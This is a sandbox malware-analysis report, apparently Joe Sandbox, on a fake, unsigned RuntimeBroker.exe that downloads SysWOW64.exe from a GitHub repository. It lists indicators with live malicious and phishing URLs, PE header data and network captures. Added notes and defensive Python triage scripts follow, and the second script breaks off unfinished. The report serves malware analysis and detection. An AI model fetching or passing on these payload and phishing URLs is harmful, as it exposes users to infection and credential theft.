ax-9999.ax-msedge.net:
  • 7NOT92-GmT6-1OjO9-R14.msi | malicious | Unknown | 150.171.27.254
  • https://eu-central-1.protection.sophos.com/?d=klclick3.com&u=aHR0cHM6Ly9jdHJrLmtsY2xpY2szLmNvbS9sLzAxSlE2TldIMFdaVkdNV0tBODFNQkZGN1JUXzI=&p=m&i=NjcwOGRlNTQxNWVkNDAyNmUyZjA5MzFh&t=VUNaZ1Yza2szQkUxQ2V5U3gwNDYvRXh1ZWpOb1orVWYwMkVMRzFlQmtmMD0=&h=696c0b13c9bb46b2b210e89a34578cd9&s=AVNPUEhUT0NFTkNSWVBUSVbYlGfZU66j8K_UDSuTsyS5h7hisQMzbX-xxgbWnDCCvg | malicious | HTMLPhisher | 150.171.27.254
  • 3Judiciario02-jRc3-8Gwc1-T12.msi | malicious | Unknown | 150.171.27.254
  • 6FUm1OkfM3.exe | malicious | CryptOne | 150.171.27.254
  • RXFXJSCBCP.exe | malicious | CryptOne | 150.171.27.254
  • random.exe2.exe | malicious | Healer AV Disabler | 150.171.27.254
  • AG5SpY2I0y.exe | malicious | XWorm | 150.171.27.254
  • UeiROaQBew.exe | malicious | Unknown | 150.171.28.254
  • http://fliqlo.app | malicious | Unknown | 150.171.27.254
  • Df2V52Gob5.exe | malicious | Rusty Stealer | 150.171.27.254

raw.githubusercontent.com:
  • climb.exe | malicious | LummaC Stealer | 185.199.110.133
  • x-ray-health-record.bat | malicious | Braodo | 185.199.108.133
  • xxrkjufx.exe | malicious | NeptuneRAT | 185.199.111.133
  • Logger.exe | malicious | Unknown | 185.199.111.133
  • MasonClient.exe | malicious | NeptuneRAT | 185.199.111.133
  • SecuriteInfo.com.Trojan.GenericKD.76058097.12003.12326.exe | malicious | Unknown | 185.199.110.133
  • SecuriteInfo.com.Trojan.GenericKD.76058097.12003.12326.exe | malicious | Unknown | 185.199.108.133
  • u1.ps1 | malicious | Unknown | 185.199.110.133
  • S0FTWARE.exe | malicious | Vidar | 185.199.111.133
  • x96lib.exe | malicious | NeptuneRAT | 185.199.111.133

github.com:
  • climb.exe | malicious | LummaC Stealer | 140.82.112.3
  • t3333-03-2825.bat | malicious | Braodo | 140.82.112.3
  • x-ray-health-record.bat | malicious | Braodo | 140.82.114.3
  • https://jv.wijaxbosjm.es/nwbGgL/ | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 140.82.114.3
  • Revised - College of the canyons 2025 Handbook80114.doc | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 140.82.114.4
  • xxrkjufx.exe | malicious | NeptuneRAT | 140.82.113.3
  • Logger.exe | malicious | Unknown | 140.82.113.3
  • MasonClient.exe | malicious | NeptuneRAT | 140.82.113.3
  • https://L1h.toliviraxen.ru/MzobBPAf/ | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 140.82.114.3
  • https://publuu.com/flip-book/830106/1826131 | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 140.82.114.4
Match (ASN): Associated Sample Name / URL | Detection | Threat Name | Context

GITHUBUS:
  • climb.exe | malicious | LummaC Stealer | 140.82.112.3
  • t3333-03-2825.bat | malicious | Braodo | 140.82.112.3
  • x-ray-health-record.bat | malicious | Braodo | 140.82.114.3
  • https://jv.wijaxbosjm.es/nwbGgL/ | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 140.82.114.3
  • Revised - College of the canyons 2025 Handbook80114.doc | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 140.82.114.4
  • xxrkjufx.exe | malicious | NeptuneRAT | 140.82.113.3
  • Logger.exe | malicious | Unknown | 140.82.113.3
  • MasonClient.exe | malicious | NeptuneRAT | 140.82.113.3
  • https://L1h.toliviraxen.ru/MzobBPAf/ | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 140.82.114.3
  • https://publuu.com/flip-book/830106/1826131 | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 140.82.114.4

FASTLYUS:
  • maksrat.jar | malicious | Unknown | 199.232.88.209
  • climb.exe | malicious | LummaC Stealer | 185.199.110.133
  • 7ivgZ6j7.pdf | malicious | Unknown | 199.232.90.172
  • https://saonacollection.com/Core/-/userid/chudy | malicious | Unknown | 151.101.194.132
  • https://saonacollection.com/Core/-/userid/chudy | malicious | Unknown | 151.101.66.132
  • arm6.elf | malicious | Unknown | 199.232.90.49
  • x-ray-health-record.bat | malicious | Braodo | 185.199.108.133
  • https://jv.wijaxbosjm.es/nwbGgL/ | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 151.101.194.137
  • Hess Vioce Message.pdf | malicious | Unknown | 23.185.0.1
  • https://beekbyanna.formstack.com/forms/info | malicious | HTMLPhisher | 199.232.88.157
Match (fingerprint): Associated Sample Name / URL | Detection | Threat Name | Context

3b5074b1b5d032e5620f69f9f700ff0e:
  • climb.exe | malicious | LummaC Stealer | 140.82.114.4
  • t3333-03-2825.bat | malicious | Braodo | 140.82.114.4
  • 66GPrIRLfp.exe | malicious | Discord Token Stealer | 140.82.114.4
  • x-ray-health-record.bat | malicious | Braodo | 140.82.114.4
  • xxrkjufx.exe | malicious | NeptuneRAT | 140.82.114.4
  • XCsslient.exe | malicious | XWorm | 140.82.114.4
  • SPChaotic.exe | malicious | XWorm | 140.82.114.4
  • SysRuntime.exe | malicious | XWorm | 140.82.114.4
  • SystemRuntime.exe | malicious | XWorm | 140.82.114.4
  • MasonClient.exe | malicious | NeptuneRAT | 140.82.114.4
                                            No context
                                            No created / dropped files found
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):6.407669504084401
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:RuntimeBroker.exe
                                            File size:79'392 bytes
                                            MD5:61fd0424631fc50f17989c516950935e
                                            SHA1:8b616f88f47a9aa473512a91a8b3b39a7949aff7
                                            SHA256:c829147f0697e5a7c72e6aaac0b092b4d2a5e3d6a0132d540c49d2ea432877b9
                                            SHA512:e0bc65029e6fe0e7b4bf12d7ef5b3e64dbd926778c7e6df6c1c72ab754c36eeba7a837d8a611510aa729fce648aa01af8c1f0d3aebcfc89978718c22e3f3ffff
                                            SSDEEP:1536:Yzp+nkIgYxM+hTjAo1RGBbrd9BPJXyyRTB:aZT9+NsuRebrhPJj/
                                            TLSH:6873B301F4415601E498357AC1E6A8B8137DA5FBE263814A6FF223D7CBE35D21E47A8F
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,............."...0......$...........@... ....@.. ....................... ............`................................
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0x41a00a
                                            Entrypoint Section:UPX
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xA6EAA72C [Fri Sep 27 23:47:56 2058 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [0041A000h]
add byte ptr [eax], al   (this line repeats 97 times in the original listing: zero bytes following the entry-point jump, disassembled as add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xab3c | 0x4f |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x5de |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x20000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1a000 | 0x8 | UPX
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x4000 | 0x48 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
w7 | 0x2000 | 0xaa4 | 0xc00 | e78a8b487ff2cb0f91bc58ada7786c16 | False | 1.0035807291666667 | data | 7.939048109812574 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(nameless) | 0x4000 | 0x10a74 | 0x10c00 | 50fe44d0824f34b42a70297a79b85769 | False | 0.4703533115671642 | data | 6.447239384693461 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
(nameless) | 0x16000 | 0x5de | 0x600 | 6df8f39be90781d07b101c31e07590ea | False | 0.42578125 | data | 4.162010888053922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.Enigma | 0x18000 | 0xa | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX | 0x1a000 | 0x10 | 0x200 | a8be9c99d1e250a82a199e42ed72ef0a | False | 0.04296875 | data | 0.12227588125913882 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
zjifahsi | 0x1c000 | 0xb81 | 0xc00 | 9d982ae05f0799aa9dcb630b1c990a28 | False | 0.24674479166666666 | data | 5.361450215834434 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.UPX | 0x1e000 | 0x8b | 0x200 | c391ba0c64258e9d98fe84a6864df69b | False | 0.0390625 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x20000 | 0xc | 0x200 | aff5b30ceb43f61f913db3abeba94533 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            RT_VERSION | 0x160a0 | 0x354 | data | - | - | 0.4166666666666667
                                            RT_MANIFEST | 0x163f4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347
                                            DLL | Import
                                            mscoree.dll | _CorExeMain
                                            Description | Data
                                            Translation | 0x0000 0x04b0
                                            Comments | RuntimeBroker
                                            CompanyName | Microsoft Inc.
                                            FileDescription | RuntimeBroker
                                            FileVersion | 1.0.0.0
                                            InternalName | RuntimeBroker.exe
                                            LegalCopyright | Copyright 2015
                                            LegalTrademarks | -
                                            OriginalFilename | RuntimeBroker.exe
                                            ProductName | -
                                            ProductVersion | 1.0.0.0
                                            Assembly Version | 1.0.0.0
                                            Note: the version resource names "Microsoft Inc." as the company; the genuine RuntimeBroker.exe is shipped by Microsoft Corporation and is Authenticode-signed, whereas this file's IMAGE_DIRECTORY_ENTRY_SECURITY directory is empty, so it carries no signature. The only import is mscoree.dll!_CorExeMain, the COM descriptor (CLR header) directory is populated and an Assembly Version is present, so this is a managed (.NET) executable, whatever the sandbox's language heuristic reports further down.
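The section and directory tables above carry the indicators a reviewer checks by hand: two sections mapped read/write/execute, two with no name, an import table and CLR header placed in nameless or oddly named sections. The following Python is an added example, not code from the Joe Sandbox report or from the sample, that applies those checks to a PE32 section table. It builds a header-only image in memory from the section layout printed above; the entry-point RVA of 0x2004, the empty section bodies and the list of "standard" section names are assumptions of the example, not values from the report.

```python
"""PE section-table triage.

Added example; not code from the Joe Sandbox report or from the sample.
It parses the section headers of a PE32 image and applies the checks a
reviewer makes on the section table above: sections mapped read+write+
execute, nameless or non-standard section names, and an entry point that
falls outside any IMAGE_SCN_CNT_CODE section.  The image it runs on is
built in memory from the section layout the report prints; the entry-point
RVA (0x2004), the empty section bodies and STANDARD_NAMES are assumptions
of this example, not report values.
"""
import struct
from dataclasses import dataclass

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names an ordinary linker emits; anything else deserves a look (assumption).
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".bss", ".tls", ".CRT"}
SECTION_HEADER = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int

    @property
    def label(self) -> str:
        return self.name or "<nameless>"

    def contains(self, rva: int) -> bool:
        span = max(self.virtual_size, self.raw_size)
        return self.virtual_address <= rva < self.virtual_address + span


def build_pe32(sections, entry_rva: int) -> bytes:
    """Build a header-only PE32 image: DOS header, PE signature, COFF header,
    an optional header with only Magic and AddressOfEntryPoint set, and the
    section table.  Section bodies are omitted; the parser never reads them."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = bytearray(0xE0)                        # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)        # IMAGE_NT_OPTIONAL_HDR32_MAGIC
    struct.pack_into("<I", opt, 16, entry_rva)   # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(
        struct.pack(SECTION_HEADER, s.name.encode("ascii").ljust(8, b"\0"),
                    s.virtual_size, s.virtual_address, s.raw_size,
                    0, 0, 0, 0, 0, s.characteristics)
        for s in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


def parse_pe32(data: bytes):
    """Return (AddressOfEntryPoint, [Section]) read from a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt_off = e_lfanew + 24
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]
    sections = []
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HEADER, data, opt_off + opt_size + 40 * i)
        name = f[0].rstrip(b"\0").decode("latin-1")
        sections.append(Section(name, f[2], f[1], f[3], f[9]))
    return entry, sections


def triage(entry: int, sections) -> list:
    """Return (section label, finding) pairs, sections first, entry point last."""
    findings = []
    for s in sections:
        c = s.characteristics
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            findings.append((s.label, "rwx"))
        if not s.name:
            findings.append((s.label, "nameless"))
        elif s.name not in STANDARD_NAMES:
            findings.append((s.label, "non-standard name"))
    holder = next((s for s in sections if s.contains(entry)), None)
    if holder is None:
        findings.append(("<none>", "entry point maps to no section"))
    elif not holder.characteristics & IMAGE_SCN_CNT_CODE:
        findings.append((holder.label, "entry point in non-code section"))
    elif holder.name != ".text":
        findings.append((holder.label, "entry point outside .text"))
    return findings


R, W, X = IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE
CODE, IDATA, DISC = IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE

# Layout copied from the report's section table: name, VA, virtual size, raw size, flags.
REPORT_SECTIONS = [
    Section("w7",       0x02000, 0x00aa4, 0x00c00, IDATA | X | R | W),
    Section("",         0x04000, 0x10a74, 0x10c00, CODE | X | R),
    Section("",         0x16000, 0x005de, 0x00600, IDATA | R),
    Section(".Enigma",  0x18000, 0x0000a, 0x00200, IDATA | X | R | W),
    Section("UPX",      0x1a000, 0x00010, 0x00200, CODE | X | R),
    Section("zjifahsi", 0x1c000, 0x00b81, 0x00c00, IDATA | R),
    Section(".UPX",     0x1e000, 0x0008b, 0x00200, IDATA | R),
    Section(".reloc",   0x20000, 0x0000c, 0x00200, IDATA | DISC | R),
]
ASSUMED_ENTRY_RVA = 0x2004  # assumption: the report does not print the entry RVA


def run_sample() -> list:
    entry, sections = parse_pe32(build_pe32(REPORT_SECTIONS, ASSUMED_ENTRY_RVA))
    return triage(entry, sections)


if __name__ == "__main__":
    for label, finding in run_sample():
        print(f"{label:10s} {finding}")
```

To run this against a real file, pass the file's bytes to `parse_pe32` instead of the constructed image; only the headers are read. The `contains` check uses the larger of virtual and raw size because packers routinely declare a tiny VirtualSize for a section whose raw data (and entry point) is much larger.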


                                            • Total Packets: 18
                                            • 443 (HTTPS)
                                            • 53 (DNS)
                                            TCP packets
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Mar 29, 2025 14:00:36.612060070 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:36.612101078 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:36.612175941 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:36.632260084 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:36.632280111 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:36.874435902 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:36.874514103 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:36.878875017 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:36.878889084 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:36.879178047 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:36.929311037 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:36.951514006 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:36.992285967 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:37.204689980 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:37.204783916 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:37.204853058 CET | 443 | 49712 | 140.82.114.4 | 192.168.2.5
                                            Mar 29, 2025 14:00:37.206286907 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:37.206729889 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:37.210618019 CET | 49712 | 443 | 192.168.2.5 | 140.82.114.4
                                            Mar 29, 2025 14:00:37.305083990 CET | 49713 | 443 | 192.168.2.5 | 185.199.108.133
                                            Mar 29, 2025 14:00:37.305114985 CET | 443 | 49713 | 185.199.108.133 | 192.168.2.5
                                            Mar 29, 2025 14:00:37.305223942 CET | 49713 | 443 | 192.168.2.5 | 185.199.108.133
                                            Mar 29, 2025 14:00:37.305546999 CET | 49713 | 443 | 192.168.2.5 | 185.199.108.133
                                            Mar 29, 2025 14:00:37.305557013 CET | 443 | 49713 | 185.199.108.133 | 192.168.2.5
                                            Mar 29, 2025 14:00:39.954952955 CET | 49713 | 443 | 192.168.2.5 | 185.199.108.133
                                            UDP packets
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Mar 29, 2025 14:00:36.498598099 CET | 52530 | 53 | 192.168.2.5 | 1.1.1.1
                                            Mar 29, 2025 14:00:36.598462105 CET | 53 | 52530 | 1.1.1.1 | 192.168.2.5
                                            Mar 29, 2025 14:00:37.214771986 CET | 57515 | 53 | 192.168.2.5 | 1.1.1.1
                                            Mar 29, 2025 14:00:37.304069042 CET | 53 | 57515 | 1.1.1.1 | 192.168.2.5
                                            Mar 29, 2025 14:00:38.923979998 CET | 65470 | 53 | 192.168.2.5 | 1.1.1.1
                                            Mar 29, 2025 14:00:39.026340961 CET | 53 | 65470 | 1.1.1.1 | 192.168.2.5
                                            Mar 29, 2025 14:00:44.655904055 CET | 55008 | 53 | 192.168.2.5 | 1.1.1.1
                                            Mar 29, 2025 14:00:44.754340887 CET | 53 | 55008 | 1.1.1.1 | 192.168.2.5
                                            DNS queries
                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                            Mar 29, 2025 14:00:36.498598099 CET | 192.168.2.5 | 1.1.1.1 | 0xf5c7 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:37.214771986 CET | 192.168.2.5 | 1.1.1.1 | 0x1185 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:38.923979998 CET | 192.168.2.5 | 1.1.1.1 | 0x99d9 | Standard query (0) | 35.56.3.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:44.655904055 CET | 192.168.2.5 | 1.1.1.1 | 0x7bad | Standard query (0) | c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com | A (IP address) | IN (0x0001) | false
                                            DNS answers
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                            Mar 29, 2025 14:00:36.598462105 CET | 1.1.1.1 | 192.168.2.5 | 0xf5c7 | No error (0) | github.com | - | 140.82.114.4 | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:37.304069042 CET | 1.1.1.1 | 192.168.2.5 | 0x1185 | No error (0) | raw.githubusercontent.com | - | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:37.304069042 CET | 1.1.1.1 | 192.168.2.5 | 0x1185 | No error (0) | raw.githubusercontent.com | - | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:37.304069042 CET | 1.1.1.1 | 192.168.2.5 | 0x1185 | No error (0) | raw.githubusercontent.com | - | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:37.304069042 CET | 1.1.1.1 | 192.168.2.5 | 0x1185 | No error (0) | raw.githubusercontent.com | - | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:39.026340961 CET | 1.1.1.1 | 192.168.2.5 | 0x99d9 | Name error (3) | 35.56.3.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:44.754340887 CET | 1.1.1.1 | 192.168.2.5 | 0x7bad | Name error (3) | c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com | none | none | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:44.859985113 CET | 1.1.1.1 | 192.168.2.5 | 0x4532 | No error (0) | ax-ring.ax-9999.ax-msedge.net | ax-9999.ax-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:44.859985113 CET | 1.1.1.1 | 192.168.2.5 | 0x4532 | No error (0) | ax-9999.ax-msedge.net | - | 150.171.28.254 | A (IP address) | IN (0x0001) | false
                                            Mar 29, 2025 14:00:44.859985113 CET | 1.1.1.1 | 192.168.2.5 | 0x4532 | No error (0) | ax-9999.ax-msedge.net | - | 150.171.27.254 | A (IP address) | IN (0x0001) | false
                                            Note: the github.com (0xf5c7) and raw.githubusercontent.com (0x1185) lookups are each immediately followed by one of the two TCP sessions above (ports 49712 and 49713), so those two are the sample's own traffic. The PTR query and the Microsoft-operated footprintdns.com and ax-msedge.net names are not tied to any connection listed here, and the 0x4532 answer has no matching query in this list.
                                            HTTPS session: github.com
                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            0 | 192.168.2.5 | 49712 | 140.82.114.4 | 443 | 7788 | C:\Users\user\Desktop\RuntimeBroker.exe
                                            Note: the request below carries no User-Agent header and fetches an .exe from a GitHub repository's raw endpoint; the file name SysWOW64.exe mimics a Windows system directory. github.com answers with a 302 to raw.githubusercontent.com, which the process resolved (transaction 0x1185) and connected to on port 49713 within a millisecond of the answer, so the redirect was followed; the content of that second session is not shown here.
                                            Timestamp | Bytes transferred | Direction | Data
                                            2025-03-29 13:00:36 UTC | 113 | OUT | GET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1
                                            Host: github.com
                                            Connection: Keep-Alive
                                            2025-03-29 13:00:37 UTC | 562 | IN | HTTP/1.1 302 Found
                                            Date: Sat, 29 Mar 2025 13:00:37 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 0
                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame,Accept-Encoding, Accept, X-Requested-With
                                            Access-Control-Allow-Origin:
                                            Location: https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe
                                            Cache-Control: no-cache
                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                            X-Frame-Options: deny
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 0
                                            Referrer-Policy: no-referrer-when-downgrade
                                            2025-03-29 13:00:37 UTC3476INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75
                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.githu
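The exchange above is everything the sandbox decrypted for this session: a GET with no User-Agent for an .exe under a GitHub repository, answered by a 302 to raw.githubusercontent.com. The Python below is an added example, not code from the report or from the sample, that encodes the checks an analyst applies to such an exchange and runs them on constructed copies of the request, the (abbreviated) response headers and the DNS answers from the tables above. The host list and the executable-suffix list are the example's own assumptions.

```python
"""Triage of one plaintext HTTP exchange from a sandbox capture.

Added example; not code from the Joe Sandbox report or from the sample.
REQUEST, RESPONSE and DNS_ANSWERS are constructed copies of the request,
the (abbreviated) response headers and the DNS answers printed in the
report.  RAW_CODE_HOSTS and EXECUTABLE_SUFFIXES are assumptions of this
example.
"""
from urllib.parse import urlsplit

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".msi", ".ps1", ".bat", ".cmd")
# Hosts frequently used to stage payloads as "raw" repository files (assumption).
RAW_CODE_HOSTS = {"github.com", "raw.githubusercontent.com",
                  "objects.githubusercontent.com", "gist.githubusercontent.com"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_http_message(text: str):
    """Return (start line, {lower-cased name: value}) for one HTTP/1.x message."""
    head = text.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return start, headers


def triage_exchange(request: str, response: str, dns_answers, dst_ip: str) -> list:
    """Return (tag, detail) findings for one request/response pair.

    dns_answers: (name, address) pairs seen in the same capture.
    dst_ip: the address the request was sent to."""
    findings = []
    req_line, req_hdrs = parse_http_message(request)
    method, target, _version = req_line.split(" ", 2)
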